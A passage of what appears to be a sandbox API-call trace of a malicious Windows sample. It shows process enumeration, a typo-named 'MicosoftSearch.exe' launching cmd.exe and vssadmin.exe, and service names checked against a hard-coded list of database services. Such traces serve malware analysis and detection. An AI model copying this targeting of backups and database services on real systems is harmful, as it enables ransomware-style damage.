hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0054.475] lstrlenW (lpString="confidence.exe") returned 14 [0054.475] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0054.476] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0054.476] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0054.477] lstrlenW (lpString="blue.exe") returned 8 [0054.477] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0054.543] lstrlenW (lpString="newly debut.exe") returned 15 [0054.544] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0054.544] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0054.544] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0054.545] lstrlenW (lpString="archive.exe") returned 11 [0054.545] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0054.554] lstrlenW (lpString="defend.exe") returned 10 [0054.554] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0054.555] lstrlenW (lpString="arservice.exe") returned 13 [0054.555] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0054.556] lstrlenW (lpString="rr-programmer.exe") returned 17 [0054.556] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0054.557] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0054.557] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0054.558] lstrlenW (lpString="twistedmonton.exe") returned 17 [0054.558] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0054.559] lstrlenW (lpString="arc plains.exe") returned 14 [0054.559] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0054.559] lstrlenW (lpString="americahousestip.exe") returned 20 [0054.559] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0054.560] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0054.560] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0054.561] lstrlenW (lpString="medical lectures.exe") returned 20 [0054.561] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0054.562] lstrlenW (lpString="electronic.exe") returned 14 [0054.562] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0054.563] lstrlenW (lpString="regression.exe") returned 14 [0054.563] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0054.563] lstrlenW (lpString="county.exe") returned 10 [0054.563] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.564] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0054.564] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0054.565] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0054.565] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.566] lstrlenW (lpString="cmd.exe") returned 7 [0054.566] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.567] lstrlenW (lpString="conhost.exe") returned 11 [0054.567] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0054.567] lstrlenW (lpString="vssadmin.exe") returned 12 [0054.567] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0054.568] lstrlenW (lpString="VSSVC.exe") returned 9 [0054.568] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.569] lstrlenW (lpString="svchost.exe") returned 11 [0054.569] Process32NextW (in: hSnapshot=0x1e8, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0054.570] CloseHandle (hObject=0x1e8) returned 1 [0054.570] Sleep (dwMilliseconds=0x1f4) [0055.375] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232d60 [0055.376] EnumServicesStatusExW (in: hSCManager=0x4232d60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0055.376] GetLastError () returned 0xea [0055.377] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0055.377] EnumServicesStatusExW (in: hSCManager=0x4232d60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0055.377] CloseServiceHandle (hSCObject=0x4232d60) returned 1 [0055.378] lstrlenW (lpString="Appinfo") returned 7 [0055.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0055.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0055.378] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0055.378] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0055.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0055.378] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0055.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.378] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0055.378] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0055.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0055.378] lstrlenW (lpString="AudioSrv") returned 8 [0055.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0055.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0055.378] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0055.378] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0055.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0055.378] lstrlenW (lpString="BFE") returned 3 [0055.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0055.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0055.378] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0055.378] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0055.378] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0055.378] lstrlenW (lpString="CryptSvc") returned 8 [0055.378] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0055.378] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0055.378] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0055.378] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0055.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0055.379] lstrlenW (lpString="CscService") returned 10 [0055.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0055.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0055.379] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0055.379] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0055.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0055.379] lstrlenW (lpString="DcomLaunch") returned 10 [0055.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.379] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0055.379] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0055.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0055.379] lstrlenW (lpString="Dhcp") returned 4 [0055.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0055.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0055.379] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0055.379] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0055.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0055.379] lstrlenW (lpString="Dnscache") returned 8 [0055.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0055.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0055.379] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0055.379] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0055.379] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0055.379] lstrlenW (lpString="DPS") returned 3 [0055.379] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0055.379] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0055.379] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0055.380] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0055.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0055.380] lstrlenW (lpString="eventlog") returned 8 [0055.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0055.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0055.380] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0055.380] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0055.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0055.380] lstrlenW (lpString="EventSystem") returned 11 [0055.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0055.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0055.380] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0055.380] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0055.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0055.380] lstrlenW (lpString="gpsvc") returned 5 [0055.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0055.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0055.380] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0055.380] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0055.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0055.380] lstrlenW (lpString="iphlpsvc") returned 8 [0055.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.380] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0055.380] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0055.380] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0055.380] lstrlenW (lpString="LanmanServer") returned 12 [0055.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0055.380] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0055.380] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0055.380] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0055.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0055.381] lstrlenW (lpString="LanmanWorkstation") returned 17 [0055.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.381] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0055.381] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0055.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0055.381] lstrlenW (lpString="lmhosts") returned 7 [0055.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0055.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0055.381] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0055.381] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0055.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0055.381] lstrlenW (lpString="MMCSS") returned 5 [0055.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0055.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0055.381] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0055.381] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0055.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0055.381] lstrlenW (lpString="MpsSvc") returned 6 [0055.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0055.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0055.381] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0055.381] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0055.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0055.381] lstrlenW (lpString="Netman") returned 6 [0055.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0055.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0055.381] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0055.381] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0055.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0055.381] lstrlenW (lpString="netprofm") returned 8 [0055.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0055.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0055.382] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0055.382] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0055.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0055.382] lstrlenW (lpString="NlaSvc") returned 6 [0055.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0055.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0055.382] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0055.382] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0055.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0055.382] lstrlenW (lpString="nsi") returned 3 [0055.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0055.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0055.382] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0055.382] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0055.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0055.382] lstrlenW (lpString="PcaSvc") returned 6 [0055.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0055.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0055.382] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0055.383] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0055.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0055.383] lstrlenW (lpString="PlugPlay") returned 8 [0055.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0055.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0055.383] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0055.383] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0055.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0055.383] lstrlenW (lpString="Power") returned 5 [0055.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0055.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0055.383] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0055.383] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0055.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0055.383] lstrlenW (lpString="ProfSvc") returned 7 [0055.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0055.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0055.383] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0055.383] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0055.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0055.383] lstrlenW (lpString="RpcEptMapper") returned 12 [0055.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.383] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0055.383] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0055.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0055.383] lstrlenW (lpString="RpcSs") returned 5 [0055.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0055.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0055.383] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0055.384] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0055.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0055.384] lstrlenW (lpString="SamSs") returned 5 [0055.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0055.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0055.384] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0055.384] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0055.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0055.384] lstrlenW (lpString="Schedule") returned 8 [0055.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0055.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0055.384] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0055.384] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0055.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0055.384] lstrlenW (lpString="SENS") returned 4 [0055.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0055.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0055.384] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0055.384] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0055.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0055.384] lstrlenW (lpString="ShellHWDetection") returned 16 [0055.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.384] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0055.384] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0055.384] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0055.384] lstrlenW (lpString="Spooler") returned 7 [0055.384] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0055.384] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", 